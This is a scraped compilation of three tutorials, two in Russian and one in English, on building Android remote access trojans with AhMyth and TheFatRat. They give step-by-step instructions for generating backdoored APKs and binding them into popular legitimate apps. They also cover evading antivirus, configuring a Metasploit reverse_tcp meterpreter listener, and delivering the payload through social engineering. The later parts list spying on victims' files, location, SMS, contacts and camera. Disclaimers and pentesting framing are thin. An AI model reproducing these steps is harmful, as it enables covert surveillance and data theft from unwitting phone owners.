- AhMyth. Создаем RAT для Android с помощью простого конструктора
- Содержание статьи
- Установка AhMyth RAT
- Создаем зараженный APK
- WARNING
- Продолжение доступно только участникам
- Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте
- Android Rat – TheFatRat Pentesting Tool to Hack and Gain access to Targeted Android Phone
- Automating Metasploit functions in this Android RAT
- Gaining access to Targeted Android Phone – Android RAT (TheFatRat )
- Гостевая статья Взлом Android-смартфона с помощью AhMyth Android RAT
AhMyth. Создаем RAT для Android с помощью простого конструктора
Содержание статьи
Термином RAT (Remote Access Tool) принято называть утилиты удаленного администрирования. Они могут использоваться в благих целях по своему прямому назначению, как, например, знаменитый TeamViewer, а могут устанавливаться злодеями в глубокой тайне от пользователя. В подобных случаях RAT нередко расшифровывают как Remote Access Trojan, и прямой перевод английского слова rat — «крыса» — тут приходится как нельзя кстати.
AhMyth RAT (Remote Access Trojan) — это приложение с открытым исходным кодом, в настоящее время находится на стадии бета-версии. Программа ориентирована на пользователей Windows, но на GitHub можно найти исходники и для Unix-подобных платформ.
AhMyth RAT состоит из двух компонентов.
Серверное приложение, с помощью которого можно управлять зараженным устройством и генерировать файлы APK с вредоносным кодом. Создано оно на Electron framework — фреймворке, разработанном в GitHub для создания простых графических приложений.
Клиентский APK, содержащий вредоносный код, который позволяет получить удаленный доступ к зараженному устройству. То есть наш APK будет выполнять функции бэкдора.
Установка AhMyth RAT
Серверная часть устанавливается очень просто, тем более автор выложил в свободный доступ бинарники программы. Но при желании можно скомпилировать ее из исходников. Лично я проводил свои тесты на машине под управлением Windows 10.
Для работы утилиты нам необходима виртуальная машина Java. Устанавливаем ее с официального сайта Java. Затем нужно скачать бинарники самой AhMyth. Их ты можешь найти в официальном репозитории проекта на GitHub, вкладка Assets. При скачивании лучше отключить антивирус, чтобы его не хватил удар от происходящего.
Создаем зараженный APK
Чтобы создать файл APK для Android, открой вкладку APK Builder. Внешний вид конструктора вредоносных мобильных приложений показан на следующей иллюстрации.
Вкладка с конструктором APK
Пользоваться этим инструментом очень просто. В окне Source IP мы прописываем IP-адрес атакующей машины (этот адрес потом легко вычисляется при исследовании вредоноса). В поле Source Port ты можешь указать порт, который будет зарезервирован машиной для прослушивания подключений. По умолчанию используется порт 42 474.
WARNING
Помни, что распространение вирусов и вредоносных программ — незаконное действие и влечет за собой уголовную ответственность. Вся информация предоставлена исключительно в ознакомительных целях. Ни редакция, ни автор не призывают к использованию полученных знаний в практических целях и не несут ответственности за любой возможный вред, причиненный материалом.
Без использования дополнительной опции Bind With Another Apk ты сгенерируешь мобильное приложение только с вредоносным кодом. И это практически бесполезно, поскольку заставить юзера установить такую программу можно разве что под пытками.
Но есть проверенный способ создания малвари, который используют все продвинутые вирмейкеры: найти в интернете какой-нибудь APK и склеить его с вредоносом. Для этого поставь флажок Bind With Another Apk, выбери нужный APK и укажи метод интеграции вредоноса в телефон. Есть два метода: при запуске зараженного APK или при перезагрузке телефона после установки RAT. Авторы программы рекомендуют второй вариант.
Осталось нажать кнопку Build — по умолчанию зараженный файл сохраняется в папку C:\Users\ \AhMyth\Output .
Продолжение доступно только участникам
Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте
Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее
Источник
Android Rat – TheFatRat Pentesting Tool to Hack and Gain access to Targeted Android Phone
TheFatRat is a simple Android RAT tool to build a backdoor and post exploitation attacks like browser attack. This Android RAT tool produces a malware with mainstream payload and afterward, the perfectly crafted malware will be executed on Windows, Android, Macintosh.
Malware that generated through TheFatRat has the ability to bypass Antivirus. By bypassing AV & Firewalls allows attackers to gain a Meterpreter session.
Also learn Android Hacking and Penetration Testing Course online from one of the best Cybersecurity Elearning platforms.
Automating Metasploit functions in this Android RAT
- Create backdoor for Windows, Linux, Mac, and Android
- This Android RAT Bypass antivirus backdoor
- Checks for Metasploit service and starts if not present
- Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another
- Start multiple meterpreter reverse_tcp listeners
- Fast Search in searchsploit
- Bypass AV
- File pumper
- Create backdoor with another technique
- Autorun script for listeners ( easy to use )
Gaining access to Targeted Android Phone – Android RAT (TheFatRat )
You can download this Android RAT tool TheFatRaT from Github
git clone https://github.com/Screetsec/TheFatRat.git
Once this command executed it would clone and stored under TheFatRat.
cd TheFatRat
Then we need to provide execute permission and run setup.sh
chmod +x setup.sh && ./setup.sh
Installation would take 10 to 15 minutes, during the process it checks for missing components if anything missing it will automatically download and install it.
Once installation completed you will be provided with the list of options to create a payload.
In this Kali Linux Tutorial, we go on backdooring with original APK file like, so we need to select option 5 here.
In the mean, we should have download any popular Android application file APK and then need to enter the path of the file.
Once it has done all we need to select the Meterpreter to use, here we have selected reverse_tcp.
And then you need to select the tool to be used in APK creation.
APK build in process, it decompiles the original APK to insert payloads and then recompile the application. It uses obfuscation methods to include payloads also it appends a digital signature.
Once you have the payload created with original APK file you can move to mobile phones through File transfer or any other ways.
Then we need to setup me meterpreter session through msfconsole.
msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost (your ip)
set lport (same port provided before)
exploit
Once the application installed, you will get the meterpreter session and complete control over the device.
By typing ‘help‘ you can find all the possible commands to execute.
in this Android RAT tool, You can dump calls, contacts, messages and even you can snaps with the mobile remotely.
Credit to TheFatRat Authors team for building such an Awesome and easy to implement this Android RAT tool.
You can follow us on Linkedin, Twitter, Facebook for daily Cybersecurity updates also you can take the Master in Wireshark Network Analysis to keep your self-updated.
Источник
Гостевая статья Взлом Android-смартфона с помощью AhMyth Android RAT
С возвращением, сегодня я покажу вам, как взломать смартфон Android, чтобы получить удаленный доступ. В этом уроке мы будем работать с инструментом AhMyth — инструментом удаленного доступа с открытым исходным кодом. У AhMyth есть много функций, которые вы ожидаете увидеть в RAT, таких, как мониторинг географического местоположения, модули SMS, просмотр списков контактов, диспетчер файлов, снимки камеры, микрофон магнитофон и многое другое. AhMyth очень прост в использовании благодаря простому и эффективному дизайну графического интерфейса. AhMyth — это мультиплатформенный инструмент удаленного доступа, который доступен для Linux, Windows и Apple OS.
AhMyth состоит из двух частей.
- Серверная часть: настольное приложение на базе электронного каркаса (панель управления)
- Клиентская часть: приложение для Android (бэкдор)
В этом уроке я буду использовать операционную систему на основе Linux, если вы используете Windows AhMyth, также имеется версия для Windows.
Прежде всего нам нужно установить AhMyth.
Предварительное условие:
- Электрон (чтобы, запустить приложение)
- Java (для создания apk backdoor)
- Электронный сборщик и электронный упаковщик для создания двоичных файлов для (OSX, WINDOWS, LINUX)
Сначала клонируйте AhMyth на ваше устройство.
[php]git clone https://github.com/AhMyth/AhMyth-Android-RAT.git[/php]
Затем перейдите в каталог AhMyth-Android-Rat.
[php]cd AhMyth-Android-RAT[/php]
Запустите AhMyth, используя команду ниже.
[php]npm start[/php]
Когда я впервые запустил AhMyth с npm, я получил ошибки и затем использовал эту команду для запуска AhMyth.
[php]sudo npm start –unsafe-perm[/php]
Что такое тег -unsafe-perm и каковы недостатки его использования.
Спасибо sam-github, за объяснение тега -unsafe-perm.
- Скрипты con: install запускаются от имени пользователя root, и вы, вероятно, не прочитали их все, чтобы сначала убедиться в их безопасности.
- pro: без них ни один скрипт установки не может записывать на диск в своей папке модуля, поэтому, если скрипт установки ничего не делает, кроме как распечатывает некоторые вещи в стандартном формате, то нужные вам модули не будут установлены.
Установите метод 2
- Загрузите бинарный файл с AhMyth/AhMyth-Android-RAT
Как вы можете видеть на скриншоте ниже, AhMyth успешно стартовал.
Теперь у нас есть AhMyth, чтобы настроить сервер. Это настольное приложение на основе электронного каркаса (панели управления), которое будет использоваться для создания прослушивателя для атакующего устройства.
Выберите порт, на котором вы хотите запустить сервер AhMyth. Порт по умолчанию — 42472,
после выбора порта нажмите кнопку «Listen» в правом верхнем углу приложения AhMyth.
Снимок экрана: сервер AhMyth, работающий через порт 42474
Теперь, когда сервер успешно запустил прослушиватель на выбранном порту, теперь мы можем использовать «APK Builder» для создания бэкдора Android apk.
В верхнем меню нажмите «APK Builder»
В этом уроке я буду использовать базовый бэкдор, созданный AhMyth. Вы также можете встроить бэкдор в оригинальный APK с помощью опции bind APK.
Если вы планируете использовать AhMyth в своей собственной сети, используйте свой локальный IP-адрес, если вы планируете использовать AhMyth за пределами своей собственной сети, используйте свой общедоступный IP-адрес.
Изображение показывает, что APK-файл backdoor успешно генерируется и отображается в его выходном каталоге.
Как только файл APK был успешно сгенерирован, пришло время переместить его на целевое устройство Android. Используйте любой способ доставки, который вам нравится, чтобы отправить вредоносный бэкдор, который полностью зависит от вас. Методы социальной инженерии часто могут работать лучше всего при доставке полезной нагрузки. Как только цель установит вредоносное приложение Android и запустит его, целевое устройство появится в целевом меню AhMyth.
Если мы откроем скомпрометированное Android-устройство из целевого списка, вы можете использовать различные модули из AhMyth для проведения различных оценок целевого Android-устройства.
Однажды Android-устройство было взломано. Каждый раз, когда вы открываете сеанс с устройством, будут отображаться окна со словами «Будьте в курсе». Из меню в окне мы можем использовать различные эксплойт-модули.
Диспетчер файлов позволяет получать доступ к файлам из скомпрометированных устройств Android.
Изображение показывает файловый браузер скомпрометированного устройства Android.
На рисунке ниже показан модуль гео-локации и местоположение целевого устройства Android.
На рисунке показано расположение скомпрометированного устройства Android. По соображениям конфиденциальности я отключил GPS во время демонстрации этой RAT.
С помощью AhMyth SMS-сообщения можно отправлять с скомпрометированных устройств Android на другие мобильные устройства. AhMyth также может просматривать списки SMS с целевых устройств Android.
На рисунке показан модуль отправки SMS, который используется для отправки сообщений SMS и просмотра списков SMS скомпрометированных устройств Android.
Источник